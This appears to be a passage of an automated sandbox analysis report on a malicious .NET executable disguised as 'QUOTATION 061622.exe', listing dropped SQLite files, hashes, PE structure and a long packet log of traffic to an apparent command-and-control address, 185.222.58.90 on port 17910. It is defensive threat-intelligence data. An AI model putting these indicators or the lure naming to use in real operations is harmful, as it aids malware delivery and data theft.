                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.698618937757839
                                                        Encrypted:false
                                                        SSDEEP:12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
                                                        MD5:FBFB8162B9366F7135B54193D54C2094
                                                        SHA1:9F7291EB4E117104EE4215B83F38C18607438B02
                                                        SHA-256:D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
                                                        SHA-512:452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):373760
                                                        Entropy (8bit):6.1492798216899756
                                                        Encrypted:false
                                                        SSDEEP:6144:5NcrhNqBJrO21xv5yFdg6Nn4WAw6wPCeZpxK:UrhNMB1VMo6x4WAw6wPp
                                                        MD5:C2C0094C2E70379101D9704808838355
                                                        SHA1:9A492AA61C6F36F17B296C075C26EC6C82C0F72D
                                                        SHA-256:3E962DE98112837B963063E4DB6A41ECFE2D50EFC98A5CDF87BCD98FDB1AF145
                                                        SHA-512:D307D318E6B3482C45A158FBF8B567677FCF46696FD8189D114AE71E03A82DC3CD54228E22966D9CF6A782FB4C206BA8B07E495CB13B177103A2AB7A3E3BA3E1
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 49%
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.1492798216899756
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:QUOTATION 061622.exe
                                                        File size:373760
                                                        MD5:c2c0094c2e70379101d9704808838355
                                                        SHA1:9a492aa61c6f36f17b296c075c26ec6c82c0f72d
                                                        SHA256:3e962de98112837b963063e4db6a41ecfe2d50efc98a5cdf87bcd98fdb1af145
                                                        SHA512:d307d318e6b3482c45a158fbf8b567677fcf46696fd8189d114ae71e03a82dc3cd54228e22966d9cf6a782fb4c206ba8b07e495cb13b177103a2ab7a3e3ba3e1
                                                        SSDEEP:6144:5NcrhNqBJrO21xv5yFdg6Nn4WAw6wPCeZpxK:UrhNMB1VMo6x4WAw6wPp
                                                        TLSH:2284FA2C7B451A76FF1F81744D120A04BBE62F633280A98357EB29CA875F1677F05D8A
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..b.................R...`.......p... ........@.. ...............................X....@................................
                                                        Icon Hash:c49a0894909c6494
                                                        Entrypoint:0x45708e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x62AAEE7A [Thu Jun 16 08:48:58 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x57034          0x57          .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x58000          0x5dba        .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5e000          0xc           .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
                                                        .text   0x2000           0x55094       0x55200   False     0.5053918869309838   data       6.150081957805571    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc   0x58000          0x5dba        0x5e00    False     0.4174285239361702   data       5.327489257436997    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc  0x5e000          0xc           0x200     False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name           RVA      Size    Type                                  Language  Country
                                                        AHALF          0x59a40  0xd     ASCII text, with no line terminators  English   United States
                                                        AIFRL          0x59a50  0xd     ASCII text, with no line terminators  English   United States
                                                        AJCFN          0x59a60  0xd     ASCII text, with no line terminators  English   United States
                                                        ALKFK          0x59a70  0xd     ASCII text, with no line terminators  English   United States
                                                        AMOON          0x59a80  0xd     ASCII text, with no line terminators  English   United States
                                                        BMMAM          0x59a90  0xd     ASCII text, with no line terminators  English   United States
                                                        BPKIN          0x59aa0  0xd     ASCII text, with no line terminators  English   United States
                                                        CJDJL          0x59ab0  0xd     ASCII text, with no line terminators  English   United States
                                                        CKHHK          0x59ac0  0xd     ASCII text, with no line terminators  English   United States
                                                        COMLD          0x59ad0  0xd     ASCII text, with no line terminators  English   United States
                                                        CSDHK          0x59ae0  0xd     ASCII text, with no line terminators  English   United States
                                                        CSFDF          0x59af0  0xd     ASCII text, with no line terminators  English   United States
                                                        DAJAD          0x59b00  0xd     ASCII text, with no line terminators  English   United States
                                                        DCKFA          0x59b10  0xd     ASCII text, with no line terminators  English   United States
                                                        DDAAG          0x59b20  0xd     ASCII text, with no line terminators  English   United States
                                                        DGRME          0x59b30  0xd     ASCII text, with no line terminators  English   United States
                                                        DNCRP          0x59b40  0xd     ASCII text, with no line terminators  English   United States
                                                        DSRAC          0x59b50  0xd     ASCII text, with no line terminators  English   United States
                                                        EBNKR          0x59b60  0xd     ASCII text, with no line terminators  English   United States
                                                        EFAMI          0x59b70  0xd     ASCII text, with no line terminators  English   United States
                                                        EFOHI          0x59b80  0xd     ASCII text, with no line terminators  English   United States
                                                        EISNA          0x59b90  0xd     ASCII text, with no line terminators  English   United States
                                                        EMRAH          0x59ba0  0xd     ASCII text, with no line terminators  English   United States
                                                        FAKMN          0x59bb0  0xd     ASCII text, with no line terminators  English   United States
                                                        FBONK          0x59bc0  0xd     ASCII text, with no line terminators  English   United States
                                                        FGKAR          0x59bd0  0xd     ASCII text, with no line terminators  English   United States
                                                        FIFIC          0x59be0  0xd     ASCII text, with no line terminators  English   United States
                                                        FIKCF          0x59bf0  0xd     ASCII text, with no line terminators  English   United States
                                                        FJIMA          0x59c00  0xd     ASCII text, with no line terminators  English   United States
                                                        FOHAP          0x59c10  0xd     ASCII text, with no line terminators  English   United States
                                                        GFRMF          0x59c20  0xd     ASCII text, with no line terminators  English   United States
                                                        GIKAC          0x59c30  0xd     ASCII text, with no line terminators  English   United States
                                                        GSGIC          0x59c40  0xd     ASCII text, with no line terminators  English   United States
                                                        HFAJC          0x59c50  0xd     ASCII text, with no line terminators  English   United States
                                                        HIMMD          0x59c60  0xd     ASCII text, with no line terminators  English   United States
                                                        IBNSM          0x59c70  0xd     ASCII text, with no line terminators  English   United States
                                                        IKSJP          0x59c80  0xd     ASCII text, with no line terminators  English   United States
                                                        IOHAL          0x59c90  0xd     ASCII text, with no line terminators  English   United States
                                                        JBLJD          0x59ca0  0xd     ASCII text, with no line terminators  English   United States
                                                        JHMKP          0x59cb0  0xd     ASCII text, with no line terminators  English   United States
                                                        KBRSP          0x59cc0  0xd     ASCII text, with no line terminators  English   United States
                                                        KFLKA          0x59cd0  0xd     ASCII text, with no line terminators  English   United States
                                                        KPHLD          0x59ce0  0xd     ASCII text, with no line terminators  English   United States
                                                        KSFKM          0x59cf0  0xd     ASCII text, with no line terminators  English   United States
                                                        LDKJK          0x59d00  0xd     ASCII text, with no line terminators  English   United States
                                                        LRKAD          0x59d10  0xd     ASCII text, with no line terminators  English   United States
                                                        MBDNL          0x59d20  0xd     ASCII text, with no line terminators  English   United States
                                                        MDIPI          0x59d30  0xd     ASCII text, with no line terminators  English   United States
                                                        MDJFO          0x59d40  0xd     ASCII text, with no line terminators  English   United States
                                                        MIGEA          0x59d50  0xd     ASCII text, with no line terminators  English   United States
                                                        MLDIB          0x59d60  0xd     ASCII text, with no line terminators  English   United States
                                                        MLHAM          0x59d70  0xd     ASCII text, with no line terminators  English   United States
                                                        MNDFN          0x59d80  0xd     ASCII text, with no line terminators  English   United States
                                                        MRALN          0x59d90  0xd     ASCII text, with no line terminators  English   United States
                                                        MRKLG          0x59da0  0xd     ASCII text, with no line terminators  English   United States
                                                        NDAIL          0x59db0  0xd     ASCII text, with no line terminators  English   United States
                                                        NJDII          0x59dc0  0xd     ASCII text, with no line terminators  English   United States
                                                        ODKED          0x59dd0  0xd     ASCII text, with no line terminators  English   United States
                                                        OMIKM          0x59de0  0xd     ASCII text, with no line terminators  English   United States
                                                        PAECC          0x59df0  0xd     ASCII text, with no line terminators  English   United States
                                                        PIDNA          0x59e00  0xd     ASCII text, with no line terminators  English   United States
                                                        RIMKD          0x59e10  0xd     ASCII text, with no line terminators  English   United States
                                                        RKKPI          0x59e20  0xd     ASCII text, with no line terminators  English   United States
                                                        RLOSF          0x59e30  0xd     ASCII text, with no line terminators  English   United States
                                                        ROFRS          0x59e40  0xd     ASCII text, with no line terminators  English   United States
                                                        RPFPK          0x59e50  0xd     ASCII text, with no line terminators  English   United States
                                                        RRGIF          0x59e60  0xd     ASCII text, with no line terminators  English   United States
                                                        SAABI          0x59e70  0xd     ASCII text, with no line terminators  English   United States
                                                        SELME          0x59e80  0xd     ASCII text, with no line terminators  English   United States
                                                        SIKIF          0x59e90  0xd     ASCII text, with no line terminators  English   United States
                                                        SJIDG          0x59ea0  0xd     ASCII text, with no line terminators  English   United States
                                                        SKGIE          0x59eb0  0xd     ASCII text, with no line terminators  English   United States
                                                        SKIAM          0x59ec0  0xd     ASCII text, with no line terminators  English   United States
                                                        SLEFD          0x59ed0  0xd     ASCII text, with no line terminators  English   United States
                                                        SNIAS          0x59ee0  0xd     ASCII text, with no line terminators  English   United States
                                                        RT_ICON        0x59ef0  0x468   GLS_BINARY_LSB_FIRST
                                                        RT_ICON        0x5a358  0x10a8  dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 1134929317, next used block 44344484
                                                        RT_ICON        0x5b400  0x25a8  dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                        RT_GROUP_ICON  0x5d9a8  0x30    data
                                                        RT_VERSION     0x5d9d8  0x1f8   data                                  English   United States
                                                        RT_MANIFEST    0x5dbd0  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                        DLL          Import
                                                        mscoree.dll  _CorExeMain
                                                        Language of compilation system  Country where language is spoken  Map
                                                        English                         United States
                                                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                        Jun 16, 2022 14:43:34.396464109 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396557093 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.396625042 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396732092 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.396811962 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.396903992 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.396986008 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.397072077 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.397150040 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.397211075 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.397309065 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.397392988 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.418986082 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419023037 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419049025 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419074059 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419303894 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.419441938 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.419454098 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419569969 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.419574022 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.419656992 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.419946909 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.421585083 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.442555904 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.442591906 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.442651033 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.442702055 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.442789078 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.442837000 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.444186926 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.444331884 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.444402933 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.444490910 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.444509029 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.444700003 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.445291996 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.445395947 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.445586920 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.446669102 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.466172934 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.466442108 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.466902018 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.467020988 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.467926025 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.467953920 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.468103886 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.468175888 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.468400002 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.468425035 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.468523026 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.468616009 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.469127893 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469160080 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469191074 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469284058 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.469342947 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.469439030 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469577074 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.469877958 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.469981909 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.470273018 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.470307112 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.470397949 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.470462084 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.470904112 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.489262104 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.489413977 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.489448071 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.489593029 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.489716053 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.489840031 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.490622997 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.490748882 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.491091967 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.491202116 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.491504908 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.491708040 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.491858959 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.491913080 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.492011070 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.492120981 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.492368937 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.492542982 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.492546082 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.492753029 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.492849112 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.493043900 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.493244886 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.493371010 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.493407965 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.493617058 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.493763924 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.493995905 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.494246960 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.494493008 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.494503021 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.494642973 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.494748116 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.494827032 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.494896889 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.495037079 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.495171070 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.495291948 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.495452881 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.495490074 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.495543957 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.495569944 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.495640039 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.495640993 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.495738029 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.495842934 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.495914936 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.495918989 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.496176958 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.496303082 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.496427059 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.496759892 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.496896029 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.497018099 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.497452974 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512151957 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512187004 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512213945 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512233019 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512392998 CEST4984917910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:43:34.512530088 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512558937 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512656927 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512689114 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512717009 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512746096 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512773037 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.512857914 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.513119936 CEST1791049849185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:43:34.513149023 CEST1791049849185.222.58.90192.168.2.5
